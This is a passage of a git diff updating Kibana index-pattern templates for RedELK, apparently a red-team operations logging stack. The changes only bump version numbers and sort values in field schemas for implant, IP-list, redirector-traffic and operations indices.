rd\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.3", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171862691, 16], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson index 8168a1b5..26767be9 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk-iplist.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.2", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152845450, 1832], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.3", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171864697, 18], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson index e89e95c6..e22f399a 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redelk.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.2", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152847512, 1890], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.3", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171866710, 20], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson index 608fc015..fae91607 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_redirtraffic.ndjson @@ -1 +1 @@ -{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.2", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642154954544, 16181], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171868723, 243], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson index 20cfafce..7e78ab03 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_rtops.ndjson @@ -1 +1 @@ -{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": 